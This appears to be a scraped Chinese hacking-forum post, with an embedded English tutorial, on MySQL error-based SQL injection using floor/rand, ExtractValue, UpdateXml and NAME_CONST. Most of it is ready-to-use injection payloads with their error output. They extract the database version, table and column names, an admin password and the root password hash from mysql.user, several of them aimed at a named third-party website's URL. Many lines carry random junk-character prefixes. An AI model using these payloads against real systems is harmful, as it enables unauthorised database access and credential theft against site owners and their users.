mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
首先进行正常查询：

mysql> select * from article where id = 1;
" s! B: L& r, z+ a0 J+—-+——-+———+
: A! h( O1 d9 }% a% d| id | title | content |
) ^/ M; P* M. |$ f# ]6 }+—-+——-+———+
0 d7 Q4 g/ x$ i! q1 N  r1 E|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
4 }: Q) U1 @: ^8 E  T4 \, L; gERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
% S0 o- c' `! z! ?' i$ _ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
2 |7 ^! F* U0 L: \6 l9 S+ x测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
8 D7 Y4 C- J% p) b$ f4 yERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

  s; I( ^4 F* Z5 F# |

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
2 U# x1 |( p( J: v0 d! ?2 _1 }* a
+ [0 I7 K7 a9 W* @Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

: O; F& n* u4 ~6 o! j  mErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′

MYSQL高版本报错注入技巧-利用NAME_CONST注入
; ~+ l! W, P. UIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
9 @$ h, C. u" X" h$ @
! X+ E6 g" G. S! [8 d
相关信息
9 r% n+ y9 b) A& A% Y/ x" l
" p7 G4 B" V0 p. `NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
$ d  Q' u! B5 M5 L! q2 ?
Code:
" I/ s1 X+ G+ t& @3 ~; a& uNAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
: ~' u. F. z* N, f, O) Z
( q  O4 P" p  k0 n0 ~, PSELECT NAME_CONST('TEST', 1)
# |& M. B" r& N, M' G* k


/ X8 I; I4 F5 D+ _|---------------|
|     TEST      |
|               |
; U. C) n. v# D7 d6 z, }|---------------|
|       1       |
- ~& |. Y. i$ ?4 \5 Y5 K|               |
|---------------|
+ e9 y) g- o( T: a3 Q$ z
6 K; V$ s. X# ]9 ^6 H# h5 d
/ V  p! p( Y5 z9 G6 K" n

; w& [" Y/ y; A9 u  n: Jhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
3 x7 I& o4 T/ X8 C, N0 j" c8 j
& p0 F1 h6 q: f3 u3 B5 Q% r: Y* NOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
2 R; Q: z+ V! _3 Y, w+ x

# d! L; ?2 L7 l( m& ^
% ]+ O  U- V4 x4 i  B
0 [7 g7 K2 k( \
) Q4 z* E- V# ~  Z- \' q% rCode:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--


VAR = Your MySQL variable.
9 P, ?# T$ b! {$ \8 ^& G/ F+ p
2 @! ~* ], f. r. ?, MMySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

. ]; @9 H2 x; b5 n# z9 T( hErroruplicate column name '5.0.27-community-nt'

5 R7 C5 [9 `# \) e( P
/ M* L3 b  a6 F
- y2 r, f3 E1 p2 j

( y) b/ a% }. \) ]: E' U/ jNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

) {2 ]9 `* H7 ^- f- ]Data Extraction
* e* c# M. a& d: I" w
+ |! I, J* O: C) CCode:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--


- ~- n3 e9 P& x. V4 h3 HWe should get a duplicate column 1 error...
( X& Z7 K4 `! O  l! f
% w+ y& c6 d* M; B3 ^8 p7 |Code:
  n( O" a: n9 E' uhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Erroruplicate column name '1

* v( U5 o4 z7 Y. w
/ o( M6 K* q, h# S4 q( j" x0 K: A- j


+ M3 _- Y2 n7 s  I
Now let's get the tables out this bitch..

* v( T! l) M1 l! a+ q  Q3 M% e: R* `Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--


Let's see if it works here, if it does, we can go on and finish the job.

, [  d! J3 c# }" Q1 _; G8 lCode:
' c/ P7 S8 o" C. x* a2 V, {4 b$ ehttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
' Q5 C6 H9 t  w  b/ v! S6 Z
4 M' w; J/ w6 H  {$ f
+ q, T1 w/ {# [- d  y6 ]) tErroruplicate column name 'com_admanage


) C8 Y5 ~& ?' A* A- |2 q, L  W
! o) v. [  d" P; p/ a- A


Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
3 x' s1 d% f$ P
Let's get the columns out of the user table..

Code:
" e' _" l% X7 ^: y) F7 F3 w+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--


% l. o" _- ^! ^1 tSo mine looks like this, and I get the duplicate column name 'Host'.
7 G- K7 C/ k6 j$ @. Q& c6 C( R
  q. E' K8 H/ D  K5 j2 @' ACode:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
5 ^, S, r+ V( z: ?, `% _$ x
Erroruplicate column name 'Host'
# m. y. b% z+ y  H1 O* C
2 b/ q& S3 |8 c& t6 Y! ?  ?3 m/ k


9 [3 D' k0 P  Y' L) E
9 J8 {1 g3 X% }, M2 A# D
; l* m0 ?( z' z) bWoot, time to finish this bitch off.
: S. ^/ e8 Q/ p' ^$ m# @" C  I
Code:
1 B! j9 ?7 f: y* h$ o( {+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
3 A" Z5 [6 \* @- J

So mine looks like this...
8 D! D$ N6 v, C: u5 e
5 z# Z, {9 y6 fCode:
( @; n/ |  M1 L+ w3 }9 Dhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
* N) C9 C9 p* j. ?( d7 i
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
8 F* A2 n8 i" {+ G3 C

6 {5 V( M" V0 @* y) M& H' r

% `% ]' G! f. ]7 L9 |
0 O0 q4 p& E, v0 e- U
And there we have it, thanks for reading.

' b7 C% H* m  ~. F